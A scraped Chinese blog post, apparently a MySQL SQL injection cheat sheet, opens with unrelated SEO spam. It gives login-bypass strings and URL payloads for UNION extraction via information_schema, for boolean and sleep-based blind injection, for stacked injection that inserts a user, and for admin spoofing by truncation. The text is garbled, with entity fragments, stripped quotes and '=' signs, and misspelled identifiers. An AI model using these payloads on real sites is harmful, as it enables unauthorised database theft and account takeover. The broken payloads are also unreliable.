宜昌网站seo公司,阿土伯网站做产品推广咋样,网站建设 月光博客,google优化师Mysql注释符#xff1a;单行注释#xff1a; # 在对URL使用过程中可能遇到Unicode编码问题#xff0c;可常用%23代替多行注释#xff1a;/**/单行注释#xff1a; -- 此处需要注意后面存在空格#xff0c;否则报错0.万能密码(基于SQL验证#xff0c;SQL注入)aaa or 1#aa…Mysql注释符单行注释 # 在对URL使用过程中可能遇到Unicode编码问题可常用%23代替多行注释/**/单行注释 -- 此处需要注意后面存在空格否则报错0.万能密码(基于SQL验证SQL注入)aaa or 1#aaa or 1; -- 会导致不成功应为注释掉了sql语句拼接的单引号导致无法完成查询aaa or 1; -- aaaaaaaa or 1; /******(基于%00截断绕过)aa or 1 %00/*aa or 1 %001451618646415:扰乱判定1.UNION联合注入前置关键词union ;order by;limit;union使用时需要于前置查询结果列数相同order by 可用于对指定列进行排序limit a,b取出查询的从a开始b个的指定位置数据前置关键函数database(); version();user(); database():当前数据库关键数据库information_schema思路直接查询获取union前查询语句的列数例如http://www.a.com/mysql.php?sql1 order by 4 %23%23%23 通过使用order by 排序来判定列数假设已知列数为3可进一步使用联合查询执行关键函数例如http://www.a.com/mysql.php?sql1 and 0 union select user(),version(),database()%23%23%23* 通过使用order by 排序来判定列数查询该当前数据库test有多少表例如http://www.a.com/mysql.php?sql1 and 0 union select information_schema.TABLES,2,3 where TABLE_SCHEMAtest limit 0,1%23%23%23* 通过使用information_schema的tables属性查询表结合limit逐个查询查询该当前表testTable字段信息例如http://www.a.com/mysql.php?sql1 and 0 union select information_schema.CLOUMNS,2,3 where TABLE_NAMEtestTable limit 0,1%23%23%23* 通过使用information_schema的cloumns属性查询表字段结合limit逐个查询。注意:TABLE_NAMEtestTable 建议将testTable的16进制写入进行替换扩展可以使用concat(a,--,b)函数可以将查询到的两个结果进行拼接一般用于账号于密码md5值对应2.BOOL布尔注入(盲注)前置关键函数mid() ;ord();length();mid(str,1,2)字符串截取函数ord()转为ascii码length()统计长度思路可以进行逐个字符爆破猜解使用and或者or进行测试例如http://www.a.com/mysql.php?sql1 and 0 %23%23%23%23猜测数据库长度是否为3例如http://www.a.com/mysql.php?sql1 and (select length(database())) 3%23%23%23%23猜测数据库名例如http://www.a.com/mysql.php?sql1 and (select ord(mid(database(),1,1)) 97%23%23%23%23通过截取数据库名的第一字符并转至为ascii与数字不断比较猜测完成数据库名测试后开始爆破表数量例如http://www.a.com/mysql.php?sql1 and (select count(TABLE_NAME) from infomation_schema.TABLES where TABLES_SCHEMAdatabase() limit 0,1) 3%23%23%23%23完成表数量测试后开始爆破表名例如http://www.a.com/mysql.php?sql1 and mid((select count(TABLE_NAME) from infomation_schema.TABLES where TABLES_SCHEMAdatabase() limit 0,1),1,1) 97%23%23%23%233.SLEEP延时注入(盲注)前置关键函数sleep()if();sleep():指定睡眠时间if():类似于编程的三元表达式例如猜测数据库长度例如http://www.a.com/mysql.php?sql1 and sleep(if( length(database()) 3,0,5)%23%23%23%23后面同布尔注入思路相同逐个猜测即可4.堆叠注入(Stacked Injection)前置知识SQL语法注意该方法不适用于Oracle数据库利用原理:通过;来构造执行多条语句例如可以插入信息当然前提知道可以插入的字段数据表等例如http://www.a.com/mysql.php?sql1 ;insert into users(id,username,password) value (77,acca,bbc)%23%23%23%23后面思路可以执行SQL语句的思路来进行更关键的数据获取增删查改等操作5.基于约束型注入前置知识SQL语法利用原理:由于管理员在创建数据库时可能对字段长度进行约束输入是超过其长度限制利用系统截断功能处理一般常用于insert中进行覆盖等多见于CTF题型中例如20个字符以内varchar(20),存储用户名为admin可在账户注册部分进行测试例如注册账户设置为admin%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%201,通过填充空格数进行恶意注册利用数据库自行截断功能获取的内容将变为admin(若代码存在清除空格)6.GET型注入7.POST型注入8.Cookie注入9.搜索型注入10.宽字节注入11.二次注入12.Insert注入13.报错型注入14.二次编码注入15.DNSlog注入(盲注)资料参考后记由于本人技术精力有限导致sql注入类型只是完成前5个详细说明其他进行了列举但是后期会抽出时间进行更新以上内容有参考网上其他文章已经列举至参考资料一栏若存在错误请大家予以斧正若需商业化使用请及时告知谢谢。欢迎技术交流QQ:3300744526
